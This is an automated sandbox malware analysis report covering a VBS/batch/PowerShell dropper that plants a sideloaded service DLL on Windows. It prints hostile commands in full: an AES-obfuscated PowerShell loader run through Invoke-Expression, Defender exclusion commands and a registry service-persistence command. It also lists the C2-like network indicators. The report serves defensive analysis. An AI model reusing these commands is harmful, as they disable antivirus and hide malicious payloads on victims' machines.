Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3313BA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free, 51_2_00007FFA3313BA86
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33123090 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext, 51_2_00007FFA33123090
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3313DE50 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext, 51_2_00007FFA3313DE50
Source: C:\Windows\System32\console_zero.exe Code function: -----BEGIN PUBLIC KEY----- 51_2_00007FFA3313FA60
Source: console_zero.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Windows\System32\console_zero.exe Code function: mov dword ptr [rbp+04h], 424D53FFh 51_2_00007FFA33124930
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.17:49726 version: TLS 1.2
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: usvc.dat.31.dr
Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000002E.00000002.2378540668.00007FFA243AB000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.31.dr, usvc.dat.31.dr
Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA4185014C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 46_2_00007FFA4185014C
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41850008 FindClose,FindFirstFileExW,GetLastError, 46_2_00007FFA41850008

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic TCP traffic: 192.168.2.17:49730 -> 20.71.50.126:5432
Source: global traffic HTTP traffic detected: GET /api/timezone/Etc/UTC HTTP/1.1Host: worldtimeapi.orgAccept: */*
Source: Joe Sandbox View IP Address: 213.188.196.246 213.188.196.246
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: unknown DNS query: name: ipinfo.io
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE61C20 BIO_ADDR_clear,BIO_ADDR_clear,ERR_set_mark,BIO_recvmmsg,ERR_peek_last_error,BIO_err_is_non_fatal,ERR_pop_to_mark,ERR_clear_last_mark,ERR_clear_last_mark, 46_2_00007FFA2CE61C20
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: worldtimeapi.org
Source: global traffic DNS traffic detected: DNS query: universalsqlserver.postgres.database.azure.com
Source: svchost.exe, 00000003.00000002.2339567614.00000150FCA64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/advqtdv6t35gmqvdg3dzxo4krmzq_117.0.5938.149/117.0.5
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: svchost.exe, 0000002E.00000002.2306483829.0000000064953000.00000008.00000001.01000000.0000001C.sdmp, usvc.dat.31.dr String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: svchost.exe, 0000002E.00000002.2347123421.00000224C242B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp, console_zero.exe, 00000033.00000000.2196558766.00007FF7834CD000.00000002.00000001.01000000.0000001E.sdmp, console_zero.exe, 00000033.00000002.2221368650.000001E28035C000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe.31.dr, x338625.dat.31.dr, usvc.dat.31.dr String found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTC
Source: console_zero.exe, 00000033.00000000.2196558766.00007FF7834CD000.00000002.00000001.01000000.0000001E.sdmp, console_zero.exe.31.dr, usvc.dat.31.dr String found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;
Source: console_zero.exe, 00000033.00000002.2221368650.000001E28035C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCnB
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000009.00000002.1368820099.000001DEFEA13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp, libintl-9.dll.31.dr, usvc.dat.31.dr String found in binary or memory: http://www.gnu.org/licenses/
Source: console_zero.exe String found in binary or memory: http://www.zlib.net/
Source: console_zero.exe, 00000033.00000002.2226412628.00007FFA51137000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr String found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: console_zero.exe String found in binary or memory: https://curl.se/
Source: console_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://curl.se/V
Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/copyright.html
Source: console_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://curl.se/docs/hsts.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.1368214670.000001DEFEA5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: edb.log.3.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000003.00000003.1202792782.00000150FC750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000022.00000002.1899492113.000001C7C0D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: svchost.exe, svchost.exe, 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp, x338625.dat.31.dr, usvc.dat.31.dr String found in binary or memory: https://ipinfo.io/json
Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net
Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: svchost.exe, 0000002E.00000002.2329342995.00000000660F4000.00000008.00000001.01000000.0000001D.sdmp, usvc.dat.31.dr String found in binary or memory: https://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: https://www.openssl.org/
Source: svchost.exe, 0000002E.00000002.2388271854.00007FFA2CEE1000.00000002.00000001.01000000.00000018.sdmp, svchost.exe, 0000002E.00000002.2383458007.00007FFA244AE000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, libssl-3-x64.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://www.openssl.org/H
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.17:49726 version: TLS 1.2
Source: C:\Program Files\7-Zip\7zFM.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330F1180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 51_2_00007FFA330F1180

System Summary

Source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: x447823.zip.16.dr Zip Entry: x447823.vbs
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF15730: CreateDirectoryA,CreateFileA,GetLastError,strchr,strchr,MultiByteToWideChar,DeviceIoControl,GetLastError,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,RemoveDirectoryA,_errno,CloseHandle, 46_2_00007FFA2CF15730
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\cmd.exe File created: C:\Windows
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32\010101
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\printui.exe
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\x249569.dat
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\usvc.dat
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf\winlogsvc
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x338625.dat
Source: C:\Windows\System32\cmd.exe File deleted: C:\Windows \System32\010101
Source: Joe Sandbox View Dropped File: C:\Windows\System32\libcrypto-3-x64.dll DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
Source: libiconv-2.dll.31.dr Static PE information: Number of sections : 20 > 10
Source: libintl-9.dll.31.dr Static PE information: Number of sections : 20 > 10
Source: libwinpthread-1.dll.31.dr Static PE information: Number of sections : 12 > 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
Source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.expl.evad.win7Z@86/50@3/4
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF13E00 LoadLibraryExA,GetLastError,memset,FormatMessageA,strerror,libintl_gettext, 46_2_00007FFA2CF13E00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4388:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1112:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
